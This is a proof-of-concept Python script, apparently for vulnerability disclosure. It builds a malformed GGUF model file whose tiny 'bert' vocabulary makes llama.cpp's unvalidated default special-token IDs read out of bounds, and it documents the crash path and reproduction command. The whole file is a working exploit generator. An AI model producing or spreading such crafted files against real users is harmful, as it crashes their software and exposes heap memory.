# llama-cpp-special-token-oob-poc / poc_special_token_oob.py
# Uploaded by salvepilo via huggingface_hub (commit 0584214, verified)
#!/usr/bin/env python3
"""
PoC: Heap Buffer Over-read via Unvalidated Default Special Token IDs in GGUF
Vulnerability: In llama-vocab.cpp, when tokenizer.ggml.model = "bert", default
special token IDs are set to: bos=101, unk=100, sep=102, pad=0, mask=103
(lines 1754-1763). These defaults are NOT validated against the actual vocabulary
size. If the GGUF has fewer than 104 tokens AND does not include explicit
tokenizer.ggml.bos_token_id (etc.) keys, the defaults remain.
Later, print_info() at line 3352 does:
id_to_token.at(special_bos_id) // special_bos_id = 101, vector size = 5
which throws std::out_of_range. The exception propagates up and causes model
loading to fail with "error loading model: vector" (the what() string of
std::out_of_range from vector::at). This demonstrates the unvalidated OOB access.
Additionally, if the model somehow survived past print_info(), the special token
IDs would be used in tokenization (e.g., push_back(special_bos_id=101) at line
3027), causing OOB embedding lookups -- a true heap buffer over-read.
For the "llama" tokenizer variant, special_eos_id=2 with 1 token hits the even
more dangerous id_to_token[tid] ([] operator, no bounds check) at line 2527
during the special_eog_ids loop -- true undefined behavior / heap over-read.
This script creates a raw GGUF v3 binary file with:
- general.architecture = "llama" (so llama model loader is used)
- tokenizer.ggml.model = "bert" (triggers OOB default special token IDs)
- tokenizer.ggml.tokens = 5 tokens only (indices 0-4)
- NO tokenizer.ggml.bos_token_id or other special token ID keys
- All required llama architecture metadata
- Minimal dummy tensors to pass model loading checks
"""
import math
import os
import struct
import sys

import numpy as np
# ============================================================================
# GGUF constants
# ============================================================================
GGUF_MAGIC = b"GGUF"  # first 4 bytes of every GGUF file
GGUF_VERSION = 3  # GGUF container format version written by this script
GGUF_DEFAULT_ALIGNMENT = 32  # tensor data alignment, in bytes
# GGUF value types (type tags for KV metadata entries)
GGUF_TYPE_UINT8 = 0
GGUF_TYPE_INT8 = 1
GGUF_TYPE_UINT16 = 2
GGUF_TYPE_INT16 = 3
GGUF_TYPE_UINT32 = 4
GGUF_TYPE_INT32 = 5
GGUF_TYPE_FLOAT32 = 6
GGUF_TYPE_BOOL = 7
GGUF_TYPE_STRING = 8
GGUF_TYPE_ARRAY = 9
GGUF_TYPE_UINT64 = 10
GGUF_TYPE_INT64 = 11
GGUF_TYPE_FLOAT64 = 12
# GGML tensor types (only the two used by this PoC)
GGML_TYPE_F32 = 0
GGML_TYPE_F16 = 1
# ============================================================================
# GGUF writing helpers
# ============================================================================
def write_string(f, s):
    """Serialize ``s`` to ``f`` in GGUF string format.

    Layout: little-endian uint64 byte count followed by the raw UTF-8
    bytes, with no null terminator.
    """
    payload = s.encode('utf-8')
    f.write(struct.pack('<Q', len(payload)) + payload)
def write_kv_string(f, key, value):
    """Emit one metadata KV entry whose payload is a single GGUF string."""
    write_string(f, key)
    # Type tag first, then the value itself.
    f.write(struct.pack('<I', GGUF_TYPE_STRING))
    write_string(f, value)
def write_kv_uint32(f, key, value):
    """Emit one metadata KV entry holding an unsigned 32-bit integer."""
    write_string(f, key)
    # Type tag and payload packed in a single call; '<II' yields the same
    # byte stream as two consecutive '<I' packs.
    f.write(struct.pack('<II', GGUF_TYPE_UINT32, value))
def write_kv_int32(f, key, value):
    """Emit one metadata KV entry holding a signed 32-bit integer."""
    write_string(f, key)
    # uint32 type tag immediately followed by the int32 payload.
    f.write(struct.pack('<Ii', GGUF_TYPE_INT32, value))
def write_kv_float32(f, key, value):
    """Emit one metadata KV entry holding an IEEE-754 single-precision float."""
    write_string(f, key)
    # uint32 type tag immediately followed by the float32 payload.
    f.write(struct.pack('<If', GGUF_TYPE_FLOAT32, value))
def write_kv_bool(f, key, value):
    """Emit one metadata KV entry holding a boolean, stored as a single int8."""
    write_string(f, key)
    # uint32 type tag, then the truth value coerced to 0/1 in one byte.
    f.write(struct.pack('<Ib', GGUF_TYPE_BOOL, int(bool(value))))
def write_kv_string_array(f, key, values):
    """Emit one metadata KV entry whose payload is an array of GGUF strings."""
    write_string(f, key)
    # Array header: ARRAY tag, element type, element count (uint64).
    f.write(struct.pack('<IIQ', GGUF_TYPE_ARRAY, GGUF_TYPE_STRING, len(values)))
    for item in values:
        write_string(f, item)
def write_kv_float32_array(f, key, values):
    """Emit one metadata KV entry whose payload is an array of float32 values."""
    write_string(f, key)
    # Array header: ARRAY tag, element type, element count (uint64).
    f.write(struct.pack('<IIQ', GGUF_TYPE_ARRAY, GGUF_TYPE_FLOAT32, len(values)))
    # Pack all elements in one call; identical bytes to per-element packing.
    f.write(struct.pack(f'<{len(values)}f', *values))
def write_kv_int32_array(f, key, values):
    """Emit one metadata KV entry whose payload is an array of int32 values."""
    write_string(f, key)
    # Array header: ARRAY tag, element type, element count (uint64).
    f.write(struct.pack('<IIQ', GGUF_TYPE_ARRAY, GGUF_TYPE_INT32, len(values)))
    # Pack all elements in one call; identical bytes to per-element packing.
    f.write(struct.pack(f'<{len(values)}i', *values))
def write_tensor_info(f, name, shape, ggml_type, offset):
    """Emit one tensor-info record.

    Wire format: name (GGUF string), n_dims (uint32), one int64 per
    dimension, ggml type (int32), offset within tensor data (uint64).
    """
    write_string(f, name)
    rank = len(shape)
    f.write(struct.pack('<I', rank))
    # All dimensions packed at once -- same bytes as one '<q' per dim.
    f.write(struct.pack(f'<{rank}q', *shape))
    # Trailer: type tag then data offset.
    f.write(struct.pack('<iQ', ggml_type, offset))
def tensor_byte_size(shape, ggml_type):
    """Return the raw byte size of a tensor.

    Args:
        shape: iterable of dimension sizes.
        ggml_type: one of GGML_TYPE_F32 / GGML_TYPE_F16.

    Returns:
        Element count times bytes-per-element. math.prod of an empty
        shape is 1, so a 0-d tensor sizes as a single element.

    Raises:
        ValueError: if ggml_type is not a supported type.
    """
    element_size = {GGML_TYPE_F32: 4, GGML_TYPE_F16: 2}.get(ggml_type)
    if element_size is None:
        raise ValueError(f"Unsupported ggml_type: {ggml_type}")
    return math.prod(shape) * element_size
def align_offset(offset, alignment=GGUF_DEFAULT_ALIGNMENT):
    """Round ``offset`` up to the next multiple of ``alignment``.

    Returns ``offset`` unchanged when it is already aligned.
    """
    # (-offset % alignment) is the padding needed to reach the boundary;
    # it is 0 when offset is already a multiple of alignment.
    return offset + (-offset % alignment)
# ============================================================================
# Main PoC
# ============================================================================
def create_poc_gguf(output_path: str) -> None:
    """Create a minimal GGUF that triggers OOB access via default bert special token IDs."""
    # Model hyperparameters (tiny llama architecture)
    n_vocab = 5    # ONLY 5 tokens -- bert defaults (100-103) will be OOB!
    n_embd = 32    # tiny embedding dimension
    n_head = 4     # attention heads
    n_head_kv = 4  # KV heads
    n_layer = 1    # single transformer layer
    n_ff = 64      # feed-forward dimension
    ctx_len = 128  # context length

    # Token list: only 5 tokens (indices 0-4)
    # bert defaults: bos=101, unk=100, sep=102, pad=0, mask=103
    # All except pad=0 are out of bounds!
    tokens = ["[PAD]", "[UNK]", "[CLS]", "[SEP]", "[MASK]"]
    token_scores = [0.0] * n_vocab
    token_types = [0] * n_vocab  # all normal

    # Tensors we need for a minimal llama model: (name, shape, ggml type).
    # Shapes follow llama.cpp naming; K/V projections sized by n_head_kv.
    tensors = [
        ("token_embd.weight", (n_vocab, n_embd), GGML_TYPE_F16),
        ("output_norm.weight", (n_embd,), GGML_TYPE_F32),
        ("output.weight", (n_vocab, n_embd), GGML_TYPE_F16),
        ("blk.0.attn_norm.weight", (n_embd,), GGML_TYPE_F32),
        ("blk.0.attn_q.weight", (n_embd, n_embd), GGML_TYPE_F16),
        ("blk.0.attn_k.weight", (n_head_kv * (n_embd // n_head), n_embd), GGML_TYPE_F16),
        ("blk.0.attn_v.weight", (n_head_kv * (n_embd // n_head), n_embd), GGML_TYPE_F16),
        ("blk.0.attn_output.weight", (n_embd, n_embd), GGML_TYPE_F16),
        ("blk.0.ffn_norm.weight", (n_embd,), GGML_TYPE_F32),
        ("blk.0.ffn_gate.weight", (n_ff, n_embd), GGML_TYPE_F16),
        ("blk.0.ffn_up.weight", (n_ff, n_embd), GGML_TYPE_F16),
        ("blk.0.ffn_down.weight", (n_embd, n_ff), GGML_TYPE_F16),
    ]

    # -----------------------------------------------------------------------
    # Count KV pairs
    # -----------------------------------------------------------------------
    # Architecture metadata (11 keys):
    #   general.architecture, general.name,
    #   llama.context_length, llama.embedding_length, llama.block_count,
    #   llama.attention.head_count, llama.attention.head_count_kv,
    #   llama.feed_forward_length, llama.vocab_size,
    #   llama.attention.layer_norm_rms_epsilon, llama.rope.dimension_count
    #
    # Tokenizer metadata (4 keys):
    #   tokenizer.ggml.model, tokenizer.ggml.tokens,
    #   tokenizer.ggml.scores, tokenizer.ggml.token_type
    #
    # DELIBERATELY OMITTED (to keep default OOB IDs):
    #   tokenizer.ggml.bos_token_id       (default: 101 for bert -> OOB!)
    #   tokenizer.ggml.eos_token_id       (default: LLAMA_TOKEN_NULL for bert)
    #   tokenizer.ggml.unknown_token_id   (default: 100 for bert -> OOB!)
    #   tokenizer.ggml.separator_token_id (default: 102 for bert -> OOB!)
    #   tokenizer.ggml.padding_token_id   (default: 0 for bert -> in bounds)
    n_kv = 15  # 11 arch + 4 tokenizer -- must match the write_kv_* calls below
    n_tensors = len(tensors)

    print(f"[*] Creating PoC GGUF: {output_path}")
    print(f"[*] Vocabulary size: {n_vocab} tokens (indices 0-{n_vocab-1})")
    print(f"[*] Tokenizer model: bert")
    print(f"[*] Default special token IDs (unvalidated):")
    print(f"[*]   bos_token_id  = 101 (OOB! vector size = {n_vocab})")
    print(f"[*]   unk_token_id  = 100 (OOB! vector size = {n_vocab})")
    print(f"[*]   sep_token_id  = 102 (OOB! vector size = {n_vocab})")
    print(f"[*]   mask_token_id = 103 (OOB! vector size = {n_vocab})")
    print(f"[*]   pad_token_id  = 0   (in bounds)")
    print(f"[*] No explicit special token ID keys in GGUF -> defaults are used")
    print(f"[*] Number of KV pairs: {n_kv}")
    print(f"[*] Number of tensors: {n_tensors}")

    with open(output_path, 'wb') as f:
        # ===================================================================
        # GGUF Header
        # ===================================================================
        f.write(GGUF_MAGIC)                      # magic (4 bytes)
        f.write(struct.pack('<I', GGUF_VERSION)) # version (uint32)
        f.write(struct.pack('<Q', n_tensors))    # n_tensors (uint64)
        f.write(struct.pack('<Q', n_kv))         # n_kv (uint64)

        # ===================================================================
        # KV Pairs - Architecture metadata
        # ===================================================================
        write_kv_string(f, "general.architecture", "llama")
        write_kv_string(f, "general.name", "poc-bert-oob-special-tokens")
        write_kv_uint32(f, "llama.context_length", ctx_len)
        write_kv_uint32(f, "llama.embedding_length", n_embd)
        write_kv_uint32(f, "llama.block_count", n_layer)
        write_kv_uint32(f, "llama.attention.head_count", n_head)
        write_kv_uint32(f, "llama.attention.head_count_kv", n_head_kv)
        write_kv_uint32(f, "llama.feed_forward_length", n_ff)
        write_kv_uint32(f, "llama.vocab_size", n_vocab)
        write_kv_float32(f, "llama.attention.layer_norm_rms_epsilon", 1e-5)
        write_kv_uint32(f, "llama.rope.dimension_count", n_embd // n_head)

        # ===================================================================
        # KV Pairs - Tokenizer metadata
        # ===================================================================
        # tokenizer model = "bert" -> triggers default special IDs 100-103
        write_kv_string(f, "tokenizer.ggml.model", "bert")
        # Only 5 tokens! IDs 100-103 are wildly out of bounds.
        write_kv_string_array(f, "tokenizer.ggml.tokens", tokens)
        write_kv_float32_array(f, "tokenizer.ggml.scores", token_scores)
        write_kv_int32_array(f, "tokenizer.ggml.token_type", token_types)
        # DELIBERATELY NOT INCLUDED:
        #   tokenizer.ggml.bos_token_id
        #   tokenizer.ggml.eos_token_id
        #   tokenizer.ggml.unknown_token_id
        #   tokenizer.ggml.separator_token_id
        #   tokenizer.ggml.padding_token_id
        # This means the code uses UNVALIDATED defaults from llama-vocab.cpp:1754-1763

        # ===================================================================
        # Tensor Info Entries
        # ===================================================================
        # Calculate offsets for each tensor (relative to start of tensor data)
        tensor_data_entries = []
        current_offset = 0
        for tname, tshape, ttype in tensors:
            # Each tensor's offset within the data blob must be aligned
            current_offset = align_offset(current_offset, GGUF_DEFAULT_ALIGNMENT)
            size = tensor_byte_size(tshape, ttype)
            tensor_data_entries.append((tname, tshape, ttype, current_offset, size))
            write_tensor_info(f, tname, tshape, ttype, current_offset)
            current_offset += size
        # NOTE(review): computed but never used afterwards -- kept for clarity
        total_tensor_data_size = align_offset(current_offset, GGUF_DEFAULT_ALIGNMENT)

        # ===================================================================
        # Tensor Data (aligned to GGUF_DEFAULT_ALIGNMENT from start of file)
        # ===================================================================
        # Pad to alignment boundary before tensor data
        current_pos = f.tell()
        aligned_pos = align_offset(current_pos, GGUF_DEFAULT_ALIGNMENT)
        if aligned_pos > current_pos:
            f.write(b'\x00' * (aligned_pos - current_pos))
        data_start = f.tell()

        # Write each tensor's data (all zeros)
        for tname, tshape, ttype, toffset, tsize in tensor_data_entries:
            # Pad to reach the tensor's offset
            current_data_pos = f.tell() - data_start
            target_pos = toffset
            if target_pos > current_data_pos:
                f.write(b'\x00' * (target_pos - current_data_pos))
            # Write tensor data (all zeros for PoC)
            if ttype == GGML_TYPE_F32:
                data = np.zeros(tshape, dtype=np.float32)
                # For norm weights, use ones (zero norm scales would null out
                # activations and might trip loader sanity checks)
                if "norm" in tname:
                    data = np.ones(tshape, dtype=np.float32)
                f.write(data.tobytes())
            elif ttype == GGML_TYPE_F16:
                data = np.zeros(tshape, dtype=np.float16)
                f.write(data.tobytes())

        # Final alignment padding
        current_pos = f.tell()
        aligned_pos = align_offset(current_pos, GGUF_DEFAULT_ALIGNMENT)
        if aligned_pos > current_pos:
            f.write(b'\x00' * (aligned_pos - current_pos))

    file_size = os.path.getsize(output_path)
    print(f"\n[+] Created: {output_path}")
    print(f"[+] Size: {file_size} bytes ({file_size/1024:.1f} KB)")
    print(f"\n[*] Crash path:")
    print(f"[*] 1. llama-vocab.cpp:1754-1763 sets bert defaults: bos=101, unk=100, sep=102, mask=103")
    print(f"[*] 2. llama-vocab.cpp:2130-2131 resizes id_to_token to {n_vocab} (from token list)")
    print(f"[*] 3. llama-vocab.cpp:2215-2228 only overrides if keys EXIST in GGUF (they don't)")
    print(f"[*] 4. llama-vocab.cpp:3352 does id_to_token.at(101) -> std::out_of_range -> abort()")
    print(f"\n[+] To reproduce:")
    print(f"[+]   llama-cli -m {output_path} -p 'hello'")
    print(f"[+] Expected: crash via uncaught std::out_of_range exception (abort/SIGABRT)")
if __name__ == "__main__":
    # Output directory: first CLI argument if given, otherwise a
    # "gguf_poc" directory under the current working directory.
    # (Previously hard-coded to an absolute per-user path, which only
    # worked on the original author's machine.)
    output_dir = sys.argv[1] if len(sys.argv) > 1 else os.path.join(os.getcwd(), "gguf_poc")
    os.makedirs(output_dir, exist_ok=True)
    output_path = os.path.join(output_dir, "poc_special_token_oob.gguf")
    create_poc_gguf(output_path)